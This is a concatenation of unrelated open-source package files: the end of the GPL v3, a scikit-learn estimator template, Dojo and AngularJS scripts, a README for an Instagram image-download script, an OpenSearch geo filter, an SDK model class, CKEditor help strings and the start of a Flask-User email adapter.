EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
SUCH DAMAGES.
17. Interpretation of Sections 15 and 16.
If the disclaimer of warranty and limitation of liability provided
above cannot be given local legal effect according to their terms,
reviewing courts shall apply local law that most closely approximates
an absolute waiver of all civil liability in connection with the
Program, unless a warranty or assumption of liability accompanies a
copy of the Program in return for a fee.
END OF TERMS AND CONDITIONS
How to Apply These Terms to Your New Programs
If you develop a new program, and you want it to be of the greatest
possible use to the public, the best way to achieve this is to make it
free software which everyone can redistribute and change under these terms.
To do so, attach the following notices to the program. It is safest
to attach them to the start of each source file to most effectively
state the exclusion of warranty; and each file should have at least
the "copyright" line and a pointer to where the full notice is found.
<one line to give the program's name and a brief idea of what it does.>
Copyright (C) <year> <name of author>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <https://www.gnu.org/licenses/>.
Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short
notice like this when it starts in an interactive mode:
<program> Copyright (C) <year> <name of author>
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it
under certain conditions; type `show c' for details.
The hypothetical commands `show w' and `show c' should show the appropriate
parts of the General Public License. Of course, your program's commands
might be different; for a GUI interface, you would use an "about box".
You should also get your employer (if you work as a programmer) or school,
if any, to sign a "copyright disclaimer" for the program, if necessary.
For more information on this, and how to apply and follow the GNU GPL, see
<https://www.gnu.org/licenses/>.
The GNU General Public License does not permit incorporating your program
into proprietary programs. If your program is a subroutine library, you
may consider it more useful to permit linking proprietary applications with
the library. If this is what you want to do, use the GNU Lesser General
Public License instead of this License. But first, please read
<https://www.gnu.org/licenses/why-not-lgpl.html>.
| PypiClean |
/DPA-0.0.3-cp37-cp37m-macosx_10_15_x86_64.whl/Pipeline/_template.py | import numpy as np
from sklearn.base import BaseEstimator, ClassifierMixin, TransformerMixin
from sklearn.utils.validation import check_X_y, check_array, check_is_fitted
from sklearn.utils.multiclass import unique_labels
from sklearn.metrics import euclidean_distances
class TemplateEstimator(BaseEstimator):
""" A template estimator to be used as a reference implementation.
For more information regarding how to build your own estimator, read more
in the :ref:`User Guide <user_guide>`.
Parameters
----------
demo_param : str, default='demo_param'
A parameter used for demonstation of how to pass and store paramters.
"""
def __init__(self, demo_param='demo_param'):
self.demo_param = demo_param
def fit(self, X, y):
"""A reference implementation of a fitting function.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
The training input samples.
y : array-like, shape (n_samples,) or (n_samples, n_outputs)
The target values (class labels in classification, real numbers in
regression).
Returns
-------
self : object
Returns self.
"""
X, y = check_X_y(X, y, accept_sparse=True)
self.is_fitted_ = True
# `fit` should always return `self`
return self
def predict(self, X):
""" A reference implementation of a predicting function.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
The training input samples.
Returns
-------
y : ndarray, shape (n_samples,)
Returns an array of ones.
"""
X = check_array(X, accept_sparse=True)
check_is_fitted(self, 'is_fitted_')
return np.ones(X.shape[0], dtype=np.int64)
class TemplateClassifier(BaseEstimator, ClassifierMixin):
""" An example classifier which implements a 1-NN algorithm.
For more information regarding how to build your own classifier, read more
in the :ref:`User Guide <user_guide>`.
Parameters
----------
demo_param : str, default='demo'
A parameter used for demonstation of how to pass and store paramters.
Attributes
----------
X_ : ndarray, shape (n_samples, n_features)
The input passed during :meth:`fit`.
y_ : ndarray, shape (n_samples,)
The labels passed during :meth:`fit`.
classes_ : ndarray, shape (n_classes,)
The classes seen at :meth:`fit`.
"""
def __init__(self, demo_param='demo'):
self.demo_param = demo_param
def fit(self, X, y):
"""A reference implementation of a fitting function for a classifier.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The training input samples.
y : array-like, shape (n_samples,)
The target values. An array of int.
Returns
-------
self : object
Returns self.
"""
# Check that X and y have correct shape
X, y = check_X_y(X, y)
# Store the classes seen during fit
self.classes_ = unique_labels(y)
self.X_ = X
self.y_ = y
# Return the classifier
return self
def predict(self, X):
""" A reference implementation of a prediction for a classifier.
Parameters
----------
X : array-like, shape (n_samples, n_features)
The input samples.
Returns
-------
y : ndarray, shape (n_samples,)
The label for each sample is the label of the closest sample
seen during fit.
"""
# Check is fit had been called
check_is_fitted(self, ['X_', 'y_'])
# Input validation
X = check_array(X)
closest = np.argmin(euclidean_distances(X, self.X_), axis=1)
return self.y_[closest]
class TemplateTransformer(BaseEstimator, TransformerMixin):
""" An example transformer that returns the element-wise square root.
For more information regarding how to build your own transformer, read more
in the :ref:`User Guide <user_guide>`.
Parameters
----------
demo_param : str, default='demo'
A parameter used for demonstation of how to pass and store paramters.
Attributes
----------
n_features_ : int
The number of features of the data passed to :meth:`fit`.
"""
def __init__(self, demo_param='demo'):
self.demo_param = demo_param
def fit(self, X, y=None):
"""A reference implementation of a fitting function for a transformer.
Parameters
----------
X : {array-like, sparse matrix}, shape (n_samples, n_features)
The training input samples.
y : None
There is no need of a target in a transformer, yet the pipeline API
requires this parameter.
Returns
-------
self : object
Returns self.
"""
X = check_array(X, accept_sparse=True)
self.n_features_ = X.shape[1]
# Return the transformer
return self
def transform(self, X):
""" A reference implementation of a transform function.
Parameters
----------
X : {array-like, sparse-matrix}, shape (n_samples, n_features)
The input samples.
Returns
-------
X_transformed : array, shape (n_samples, n_features)
The array containing the element-wise square roots of the values
in ``X``.
"""
# Check is fit had been called
check_is_fitted(self, 'n_features_')
# Input validation
X = check_array(X, accept_sparse=True)
# Check that the input is of the same shape as the one passed
# during fit.
if X.shape[1] != self.n_features_:
raise ValueError('Shape of input is different from what was seen'
'in `fit`')
return np.sqrt(X) | PypiClean |
/ClueDojo-1.4.3-1.tar.gz/ClueDojo-1.4.3-1/src/cluedojo/static/dojox/xmpp/util.js | if(!dojo._hasResource["dojox.xmpp.util"]){
dojo._hasResource["dojox.xmpp.util"]=true;
dojo.provide("dojox.xmpp.util");
dojo.require("dojox.string.Builder");
dojo.require("dojox.encoding.base64");
dojox.xmpp.util.xmlEncode=function(_1){
if(_1){
_1=_1.replace("&","&").replace(">",">").replace("<","<").replace("'","'").replace("\"",""");
}
return _1;
};
dojox.xmpp.util.encodeJid=function(_2){
var _3=new dojox.string.Builder();
for(var i=0;i<_2.length;i++){
var ch=_2.charAt(i);
var _4=ch;
switch(ch){
case " ":
_4="\\20";
break;
case "\"":
_4="\\22";
break;
case "#":
_4="\\23";
break;
case "&":
_4="\\26";
break;
case "'":
_4="\\27";
break;
case "/":
_4="\\2f";
break;
case ":":
_4="\\3a";
break;
case "<":
_4="\\3c";
break;
case ">":
_4="\\3e";
break;
}
_3.append(_4);
}
return _3.toString();
};
dojox.xmpp.util.decodeJid=function(_5){
_5=_5.replace(/\\([23][02367acef])/g,function(_6){
switch(_6){
case "\\20":
return " ";
case "\\22":
return "\"";
case "\\23":
return "#";
case "\\26":
return "&";
case "\\27":
return "'";
case "\\2f":
return "/";
case "\\3a":
return ":";
case "\\3c":
return "<";
case "\\3e":
return ">";
}
return "ARG";
});
return _5;
};
dojox.xmpp.util.createElement=function(_7,_8,_9){
var _a=new dojox.string.Builder("<");
_a.append(_7+" ");
for(var _b in _8){
_a.append(_b+"=\"");
_a.append(_8[_b]);
_a.append("\" ");
}
if(_9){
_a.append("/>");
}else{
_a.append(">");
}
return _a.toString();
};
dojox.xmpp.util.stripHtml=function(_c){
var re=/<[^>]*?>/gi;
for(var i=0;i<arguments.length;i++){
}
return _c.replace(re,"");
};
dojox.xmpp.util.decodeHtmlEntities=function(_d){
var ta=dojo.doc.createElement("textarea");
ta.innerHTML=_d.replace(/</g,"<").replace(/>/g,">");
return ta.value;
};
dojox.xmpp.util.htmlToPlain=function(_e){
_e=dojox.xmpp.util.decodeHtmlEntities(_e);
_e=_e.replace(/<br\s*[i\/]{0,1}>/gi,"\n");
_e=dojox.xmpp.util.stripHtml(_e);
return _e;
};
dojox.xmpp.util.Base64={};
dojox.xmpp.util.Base64.encode=function(_f){
var s2b=function(s){
var b=[];
for(var i=0;i<s.length;++i){
b.push(s.charCodeAt(i));
}
return b;
};
return dojox.encoding.base64.encode(s2b(_f));
};
dojox.xmpp.util.Base64.decode=function(_10){
var b2s=function(b){
var s=[];
dojo.forEach(b,function(c){
s.push(String.fromCharCode(c));
});
return s.join("");
};
return b2s(dojox.encoding.base64.decode(_10));
};
} | PypiClean |
/ClueDojo-1.4.3-1.tar.gz/ClueDojo-1.4.3-1/src/cluedojo/static/dojox/image/LightboxNano.js | if(!dojo._hasResource["dojox.image.LightboxNano"]){
dojo._hasResource["dojox.image.LightboxNano"]=true;
dojo.provide("dojox.image.LightboxNano");
dojo.require("dojo.fx");
(function(d){
var _1="absolute",_2="visibility",_3=function(){
var _4=(d.doc.compatMode=="BackCompat")?d.body():d.doc.documentElement,_5=dojo._docScroll();
return {w:_4.clientWidth,h:_4.clientHeight,l:_5.x,t:_5.y};
};
d.declare("dojox.image.LightboxNano",null,{href:"",duration:500,preloadDelay:5000,constructor:function(p,n){
var _6=this;
d.mixin(_6,p);
n=_6._node=dojo.byId(n);
if(n){
if(!/a/i.test(n.tagName)){
var a=d.create("a",{href:_6.href,"class":n.className},n,"after");
n.className="";
a.appendChild(n);
n=a;
}
d.style(n,"position","relative");
_6._createDiv("dojoxEnlarge",n);
d.setSelectable(n,false);
_6._onClickEvt=d.connect(n,"onclick",_6,"_load");
}
if(_6.href){
setTimeout(function(){
(new Image()).src=_6.href;
_6._hideLoading();
},_6.preloadDelay);
}
},destroy:function(){
var a=this._connects||[];
a.push(this._onClickEvt);
d.forEach(a,d.disconnect);
d.destroy(this._node);
},_createDiv:function(_7,_8,_9){
return d.create("div",{"class":_7,style:{position:_1,display:_9?"":"none"}},_8);
},_load:function(e){
var _a=this;
e&&d.stopEvent(e);
if(!_a._loading){
_a._loading=true;
_a._reset();
var i=_a._img=d.create("img",{style:{visibility:"hidden",cursor:"pointer",position:_1,top:0,left:0,zIndex:9999999}},d.body()),ln=_a._loadingNode,n=d.query("img",_a._node)[0]||_a._node,a=d.position(n,true),c=d.contentBox(n),b=d._getBorderExtents(n);
if(ln==null){
_a._loadingNode=ln=_a._createDiv("dojoxLoading",_a._node,true);
var l=d.marginBox(ln);
d.style(ln,{left:parseInt((c.w-l.w)/2)+"px",top:parseInt((c.h-l.h)/2)+"px"});
}
c.x=a.x-10+b.l;
c.y=a.y-10+b.t;
_a._start=c;
_a._connects=[d.connect(i,"onload",_a,"_show")];
i.src=_a.href;
}
},_hideLoading:function(){
if(this._loadingNode){
d.style(this._loadingNode,"display","none");
}
this._loadingNode=false;
},_show:function(){
var _b=this,vp=_3(),w=_b._img.width,h=_b._img.height,_c=parseInt((vp.w-20)*0.9),_d=parseInt((vp.h-20)*0.9),dd=d.doc,bg=_b._bg=d.create("div",{style:{backgroundColor:"#000",opacity:0,position:_1,zIndex:9999998}},d.body()),ln=_b._loadingNode;
if(_b._loadingNode){
_b._hideLoading();
}
d.style(_b._img,{border:"10px solid #fff",visibility:"visible"});
d.style(_b._node,_2,"hidden");
_b._loading=false;
_b._connects=_b._connects.concat([d.connect(dd,"onmousedown",_b,"_hide"),d.connect(dd,"onkeypress",_b,"_key"),d.connect(window,"onresize",_b,"_sizeBg")]);
if(w>_c){
h=h*_c/w;
w=_c;
}
if(h>_d){
w=w*_d/h;
h=_d;
}
_b._end={x:(vp.w-20-w)/2+vp.l,y:(vp.h-20-h)/2+vp.t,w:w,h:h};
_b._sizeBg();
d.fx.combine([_b._anim(_b._img,_b._coords(_b._start,_b._end)),_b._anim(bg,{opacity:0.5})]).play();
},_sizeBg:function(){
var dd=d.doc.documentElement;
d.style(this._bg,{top:0,left:0,width:dd.scrollWidth+"px",height:dd.scrollHeight+"px"});
},_key:function(e){
d.stopEvent(e);
this._hide();
},_coords:function(s,e){
return {left:{start:s.x,end:e.x},top:{start:s.y,end:e.y},width:{start:s.w,end:e.w},height:{start:s.h,end:e.h}};
},_hide:function(){
var _e=this;
d.forEach(_e._connects,d.disconnect);
_e._connects=[];
d.fx.combine([_e._anim(_e._img,_e._coords(_e._end,_e._start),"_reset"),_e._anim(_e._bg,{opacity:0})]).play();
},_reset:function(){
d.style(this._node,_2,"visible");
d.forEach([this._img,this._bg],function(n){
d.destroy(n);
n=null;
});
this._node.focus();
},_anim:function(_f,_10,_11){
return d.animateProperty({node:_f,duration:this.duration,properties:_10,onEnd:_11?d.hitch(this,_11):null});
},show:function(_12){
_12=_12||{};
this.href=_12.href||this.href;
var n=d.byId(_12.origin),vp=_3();
this._node=n||d.create("div",{style:{position:_1,width:0,hieght:0,left:(vp.l+(vp.w/2))+"px",top:(vp.t+(vp.h/2))+"px"}},d.body());
this._load();
if(!n){
d.destroy(this._node);
}
}});
})(dojo);
} | PypiClean |
/InstaDown_new-2.0b0.tar.gz/InstaDown_new-2.0b0/README.md | ```
_________ _ _______ _________ _______ ______ _______ _
\__ __/( ( /|( ____ \\__ __/( ___ )( __ \ ( ___ )|\ /|( ( /|
) ( | \ ( || ( \/ ) ( | ( ) || ( \ )| ( ) || ) ( || \ ( |
| | | \ | || (_____ | | | (___) || | ) || | | || | _ | || \ | |
| | | (\ \) |(_____ ) | | | ___ || | | || | | || |( )| || (\ \) |
| | | | \ | ) | | | | ( ) || | ) || | | || || || || | \ |
___) (___| ) \ |/\____) | | | | ) ( || (__/ )| (___) || () () || ) \ |
\_______/|/ )_)\_______) )_( |/ \|(______/ (_______)(_______)|/ )_)
```
DISCLAIMER: for those of you somehow thinking Steve Jobs was more than an enslaver getting phones out of Foxconn employees' tears, there seems to be an incompatibility between some of your Apple CPUs and the latest GeckoDriver instance. If the related error pops up as you run the cookie creator, you can manually download the correct driver from [the official repository](https://github.com/mozilla/geckodriver/releases). I am guessing that is the aarch64 version. Then put its location (absolute path) in the cookie_creator.py and the InstaDown.py files swapping this string:
```driver = webdriver.Firefox(executable_path=GeckoDriverManager().install(), options=fireFoxOptions)```
with this string, with your path to the downloaded geckodriver obviously:
```driver = webdriver.Firefox(executable_path="INSERT YOUR PATH", options=fireFoxOptions)```
# InstaDown
A simple python script that uses GeckoDriver to intiate an headless Firefox browser agent to download pictures from Instagram posts' URLs.
The script uses a .txt file with one post link per line to extract the images (the file contains examples already).
It renames the downloaded JPG images with the unique code identifying each post (the one after www.instagram.com/p/...).
Moreover, to ease the login phase, another .py file can be run to login and create a cookies file, that is needed by InstaDown to operate properly
## Installing
Clone this repository from Github or download it.
First you need to install the packages in requirements.txt:
```pip install -r requirements.txt```
## Setting up a list of links for download
Then, you need to open the links_list.txt and add your list of links, one per line, save it.
***IMPORTANT: Add its absolute path in the InstaDown.py file.***
To make it as easy as possible, you just need to open the .py file and search
```INSERT ABSOLUTE PATH TO```
and substitute it with your path to the file.
***You will need to do the same for the cookies file***
## Setting Up Cookies
This passage is necessary to prevent InstaDown from requesting a login everytime you open a new session. You only need to create the file once.
Open a command prompt or powershell window and set its working directory in the InstaDown folder.
Then run:
```python Cookie_creator.py```
It will open a browser in the background (invisible to the user), go to Instagram.com and ask you to input username and password in the command prompt, powershell or terminal window. *THIS IS SAFER THAN LOGGING TRADITIONALLY, ESPECIALLY FOR POTENTIALLY COMPROMISED MACHINES, BECAUSE THE INPUT IS HIDDEN TO THE USER AS WELL.*
If it logs in correctly, a cookie.pkl file will be created in your InstaDown folder.
***IMPORTANT: Add its absolute path in the InstaDown.py file.***
## Running InstaDown, step by step
Just run this in a powershell window with the InstaDown folder as working directory:
```python InstaDown.py```
It will tell you the unique code corresponding to the image it is downloading as it progresses.
You can find all the information necessary to understand the script and tweak it within the code, as it is heavily commented.
You need to give it a list of links to instagram posts, written one per line in a .txt file. Rename the .txt file links_list.txt (or change the code) and set the absolute path to your file in the script.
The images are saved in the same folder as that of InstaDown.py.
### Troubleshooting
When it crashes (because it will crash), you can see the last downloaded post in the terminal window, double check that the image has been downloaded in the output folder (named with the hashtag or username handle you scraped), fix the links_list.txt accordingly and proceed.
**IMPORTANT: if the script finishes the links, it will let you know by printing "No links to download detected!" and shut down
If it crashed because the post has been deleted and it finds no image to download, erase that link as well, otherwise it will keep crashing.
If it does not work at all, check if Meta changed the class id identifying the HTML element containing the picture link. Currently (7/22), it is "_aagv".
This is the very first functional script I have ever made and I am just starting with Python and scraping. I hope someone will find it useful!
| PypiClean |
/EOxServer-1.2.12-py3-none-any.whl/eoxserver/services/opensearch/extensions/geo.py |
from django.contrib.gis.geos import GEOSGeometry, Point, Polygon, MultiPolygon
from django.contrib.gis.measure import D
from eoxserver.core.decoders import kvp, enum
from eoxserver.core.util.xmltools import NameSpace
class GeoExtension(object):
""" Implementation of the OpenSearch `'Geo' extension draft
<http://www.opensearch.org/Specifications/OpenSearch/Extensions/Geo/1.0/Draft_2>`_.
Currently all parameters apart from the ``name`` are supported. The point
plus radius with the relation type ``contains`` requires a PostGIS database
backend.
"""
namespace = NameSpace(
"http://a9.com/-/opensearch/extensions/geo/1.0/", "geo"
)
def filter(self, qs, parameters):
decoder = GeoExtensionDecoder(parameters)
geom = decoder.box or decoder.geometry
lon, lat = decoder.lon, decoder.lat
distance = decoder.radius
relation = decoder.relation
uid = decoder.uid
if geom:
if relation == "intersects":
qs = qs.filter(footprint__intersects=geom)
elif relation == "contains":
qs = qs.filter(footprint__coveredby=geom)
elif relation == "disjoint":
qs = qs.filter(footprint__disjoint=geom)
elif lon is not None and lat is not None and distance is not None:
geom = Point(lon, lat)
if relation == "intersects":
qs = qs.filter(footprint__distance_lte=(geom, distance))
elif relation == "contains":
# TODO: right?, also only available on postgis
qs = qs.filter(footprint__dwithin=(geom, distance))
elif relation == "disjoint":
qs = qs.filter(footprint__distance_gt=(geom, distance))
elif lon is not None and lat is not None:
geom = Point(lon, lat)
if relation == "intersects":
qs = qs.filter(footprint__intersects=geom)
elif relation == "contains":
qs = qs.filter(footprint__coveredby=geom)
elif relation == "disjoint":
qs = qs.filter(footprint__disjoint=geom)
if uid:
qs = qs.filter(identifier=uid)
return qs
def get_schema(self, collection=None, model_class=None):
return (
dict(name="bbox", type="box"),
dict(name="geom", type="geometry", profiles=[
dict(
href="http://www.opengis.net/wkt/LINESTRING",
title="This service accepts WKT LineStrings"
),
dict(
href="http://www.opengis.net/wkt/POINT",
title="This service accepts WKT Point"
),
dict(
href="http://www.opengis.net/wkt/POLYGON",
title="This service accepts WKT Polygons"
),
dict(
href="http://www.opengis.net/wkt/MULTILINESTRING",
title="This service accepts WKT Multi-LineStrings"
),
dict(
href="http://www.opengis.net/wkt/MULTIPOINT",
title="This service accepts WKT Multi-Point"
),
dict(
href="http://www.opengis.net/wkt/MULTIPOLYGON",
title="This service accepts WKT Multi-Polygons"
),
]),
dict(name="lon", type="lon"),
dict(name="lat", type="lat"),
dict(name="r", type="radius"),
dict(name="georel", type="relation",
options=["intersects", "contains", "disjoint"]
),
dict(name="uid", type="uid")
)
def parse_bbox(raw):
values = list(map(float, raw.split(",")))
if len(values) != 4:
raise ValueError("Invalid number of coordinates in 'bbox'.")
minx, miny, maxx, maxy = values
if minx <= maxx:
return Polygon.from_bbox(values)
return MultiPolygon(
Polygon.from_bbox((minx, miny, 180.0, maxy)),
Polygon.from_bbox((-180.0, miny, maxx, maxy)),
)
def parse_radius(raw):
# TODO: allow the specification of additional units
value = float(raw)
if value < 0:
raise ValueError("Invalid radius specified")
return D(m=value)
class GeoExtensionDecoder(kvp.Decoder):
box = kvp.Parameter(num="?", type=parse_bbox)
radius = kvp.Parameter(num="?", type=float)
geometry = kvp.Parameter(num="?", type=GEOSGeometry)
lon = kvp.Parameter(num="?", type=float)
lat = kvp.Parameter(num="?", type=float)
relation = kvp.Parameter(num="?",
type=enum(("intersects", "contains", "disjoint"), False),
default="intersects"
)
uid = kvp.Parameter(num="?") | PypiClean |
/EnergyCapSdk-8.2304.4743.tar.gz/EnergyCapSdk-8.2304.4743/energycap/sdk/models/place_digest_actual_and_calendarized_yearly_response_commodity_data_py3.py |
from msrest.serialization import Model
class PlaceDigestActualAndCalendarizedYearlyResponseCommodityData(Model):
"""PlaceDigestActualAndCalendarizedYearlyResponseCommodityData.
:param commodity_code: The commodity code
:type commodity_code: str
:param commodity_info: The commodity info
:type commodity_info: str
:param commodity_id: The commodity identifier
:type commodity_id: int
:param target_comparison:
:type target_comparison:
~energycap.sdk.models.PlaceDigestActualAndCalendarizedYearlyResponseTargetComparison
:param cost_unit:
:type cost_unit: ~energycap.sdk.models.UnitChild
:param common_use_unit:
:type common_use_unit: ~energycap.sdk.models.UnitChild
:param common_demand_unit:
:type common_demand_unit: ~energycap.sdk.models.UnitChild
:param results: An array of yearly data
:type results:
list[~energycap.sdk.models.PlaceDigestActualAndCalendarizedYearlyResponseCommodityResults]
"""
_attribute_map = {
'commodity_code': {'key': 'commodityCode', 'type': 'str'},
'commodity_info': {'key': 'commodityInfo', 'type': 'str'},
'commodity_id': {'key': 'commodityId', 'type': 'int'},
'target_comparison': {'key': 'targetComparison', 'type': 'PlaceDigestActualAndCalendarizedYearlyResponseTargetComparison'},
'cost_unit': {'key': 'costUnit', 'type': 'UnitChild'},
'common_use_unit': {'key': 'commonUseUnit', 'type': 'UnitChild'},
'common_demand_unit': {'key': 'commonDemandUnit', 'type': 'UnitChild'},
'results': {'key': 'results', 'type': '[PlaceDigestActualAndCalendarizedYearlyResponseCommodityResults]'},
}
def __init__(self, *, commodity_code: str=None, commodity_info: str=None, commodity_id: int=None, target_comparison=None, cost_unit=None, common_use_unit=None, common_demand_unit=None, results=None, **kwargs) -> None:
super(PlaceDigestActualAndCalendarizedYearlyResponseCommodityData, self).__init__(**kwargs)
self.commodity_code = commodity_code
self.commodity_info = commodity_info
self.commodity_id = commodity_id
self.target_comparison = target_comparison
self.cost_unit = cost_unit
self.common_use_unit = common_use_unit
self.common_demand_unit = common_demand_unit
self.results = results | PypiClean |
/Flask-Statics-Helper-1.0.0.tar.gz/Flask-Statics-Helper-1.0.0/flask_statics/static/angular/i18n/angular-locale_ja-jp.js | 'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"\u5348\u524d",
"\u5348\u5f8c"
],
"DAY": [
"\u65e5\u66dc\u65e5",
"\u6708\u66dc\u65e5",
"\u706b\u66dc\u65e5",
"\u6c34\u66dc\u65e5",
"\u6728\u66dc\u65e5",
"\u91d1\u66dc\u65e5",
"\u571f\u66dc\u65e5"
],
"MONTH": [
"1\u6708",
"2\u6708",
"3\u6708",
"4\u6708",
"5\u6708",
"6\u6708",
"7\u6708",
"8\u6708",
"9\u6708",
"10\u6708",
"11\u6708",
"12\u6708"
],
"SHORTDAY": [
"\u65e5",
"\u6708",
"\u706b",
"\u6c34",
"\u6728",
"\u91d1",
"\u571f"
],
"SHORTMONTH": [
"1\u6708",
"2\u6708",
"3\u6708",
"4\u6708",
"5\u6708",
"6\u6708",
"7\u6708",
"8\u6708",
"9\u6708",
"10\u6708",
"11\u6708",
"12\u6708"
],
"fullDate": "y\u5e74M\u6708d\u65e5EEEE",
"longDate": "y\u5e74M\u6708d\u65e5",
"medium": "y/MM/dd H:mm:ss",
"mediumDate": "y/MM/dd",
"mediumTime": "H:mm:ss",
"short": "y/MM/dd H:mm",
"shortDate": "y/MM/dd",
"shortTime": "H:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "\u00a5",
"DECIMAL_SEP": ".",
"GROUP_SEP": ",",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "\u00a4-",
"negSuf": "",
"posPre": "\u00a4",
"posSuf": ""
}
]
},
"id": "ja-jp",
"pluralCat": function(n, opt_precision) { return PLURAL_CATEGORY.OTHER;}
});
}]); | PypiClean |
/FlaskCms-0.0.4.tar.gz/FlaskCms-0.0.4/flask_cms/static/js/ckeditor/plugins/a11yhelp/dialogs/lang/en.js | /*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang("a11yhelp","en",{title:"Accessibility Instructions",contents:"Help Contents. To close this dialog press ESC.",legend:[{name:"General",items:[{name:"Editor Toolbar",legend:"Press ${toolbarFocus} to navigate to the toolbar. Move to the next and previous toolbar group with TAB and SHIFT-TAB. Move to the next and previous toolbar button with RIGHT ARROW or LEFT ARROW. Press SPACE or ENTER to activate the toolbar button."},{name:"Editor Dialog",legend:"Inside a dialog, press TAB to navigate to next dialog field, press SHIFT + TAB to move to previous field, press ENTER to submit dialog, press ESC to cancel dialog. For dialogs that have multiple tab pages, press ALT + F10 to navigate to tab-list. Then move to next tab with TAB OR RIGTH ARROW. Move to previous tab with SHIFT + TAB or LEFT ARROW. Press SPACE or ENTER to select the tab page."},
{name:"Editor Context Menu",legend:"Press ${contextMenu} or APPLICATION KEY to open context-menu. Then move to next menu option with TAB or DOWN ARROW. Move to previous option with SHIFT+TAB or UP ARROW. Press SPACE or ENTER to select the menu option. Open sub-menu of current option with SPACE or ENTER or RIGHT ARROW. Go back to parent menu item with ESC or LEFT ARROW. Close context menu with ESC."},{name:"Editor List Box",legend:"Inside a list-box, move to next list item with TAB OR DOWN ARROW. Move to previous list item with SHIFT + TAB or UP ARROW. Press SPACE or ENTER to select the list option. Press ESC to close the list-box."},
{name:"Editor Element Path Bar",legend:"Press ${elementsPathFocus} to navigate to the elements path bar. Move to next element button with TAB or RIGHT ARROW. Move to previous button with SHIFT+TAB or LEFT ARROW. Press SPACE or ENTER to select the element in editor."}]},{name:"Commands",items:[{name:" Undo command",legend:"Press ${undo}"},{name:" Redo command",legend:"Press ${redo}"},{name:" Bold command",legend:"Press ${bold}"},{name:" Italic command",legend:"Press ${italic}"},{name:" Underline command",
legend:"Press ${underline}"},{name:" Link command",legend:"Press ${link}"},{name:" Toolbar Collapse command",legend:"Press ${toolbarCollapse}"},{name:" Access previous focus space command",legend:"Press ${accessPreviousSpace} to access the closest unreachable focus space before the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},{name:" Access next focus space command",legend:"Press ${accessNextSpace} to access the closest unreachable focus space after the caret, for example: two adjacent HR elements. Repeat the key combination to reach distant focus spaces."},
{name:" Accessibility Help",legend:"Press ${a11yHelp}"}]}]}); | PypiClean |
/Flask-Statics-Helper-1.0.0.tar.gz/Flask-Statics-Helper-1.0.0/flask_statics/static/angular/i18n/angular-locale_tn-za.js | 'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
function getDecimals(n) {
n = n + '';
var i = n.indexOf('.');
return (i == -1) ? 0 : n.length - i - 1;
}
function getVF(n, opt_precision) {
var v = opt_precision;
if (undefined === v) {
v = Math.min(getDecimals(n), 3);
}
var base = Math.pow(10, v);
var f = ((n * base) | 0) % base;
return {v: v, f: f};
}
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"AM",
"PM"
],
"DAY": [
"Tshipi",
"Mosopulogo",
"Labobedi",
"Laboraro",
"Labone",
"Labotlhano",
"Matlhatso"
],
"MONTH": [
"Ferikgong",
"Tlhakole",
"Mopitlo",
"Moranang",
"Motsheganang",
"Seetebosigo",
"Phukwi",
"Phatwe",
"Lwetse",
"Diphalane",
"Ngwanatsele",
"Sedimonthole"
],
"SHORTDAY": [
"Tsh",
"Mos",
"Bed",
"Rar",
"Ne",
"Tla",
"Mat"
],
"SHORTMONTH": [
"Fer",
"Tlh",
"Mop",
"Mor",
"Mot",
"See",
"Phu",
"Pha",
"Lwe",
"Dip",
"Ngw",
"Sed"
],
"fullDate": "y MMMM d, EEEE",
"longDate": "y MMMM d",
"medium": "y MMM d HH:mm:ss",
"mediumDate": "y MMM d",
"mediumTime": "HH:mm:ss",
"short": "y-MM-dd HH:mm",
"shortDate": "y-MM-dd",
"shortTime": "HH:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "R",
"DECIMAL_SEP": ".",
"GROUP_SEP": "\u00a0",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "\u00a4-",
"negSuf": "",
"posPre": "\u00a4",
"posSuf": ""
}
]
},
"id": "tn-za",
"pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]); | PypiClean |
/Flask-User-1.0.2.2.tar.gz/Flask-User-1.0.2.2/flask_user/email_adapters/smtp_email_adapter.py |
from __future__ import print_function
import smtplib
import socket
from flask import current_app
# Non-system imports are moved into the methods to make them an optional requirement
from flask_user import ConfigError, EmailError
from flask_user.email_adapters import EmailAdapterInterface
class SMTPEmailAdapter(EmailAdapterInterface):
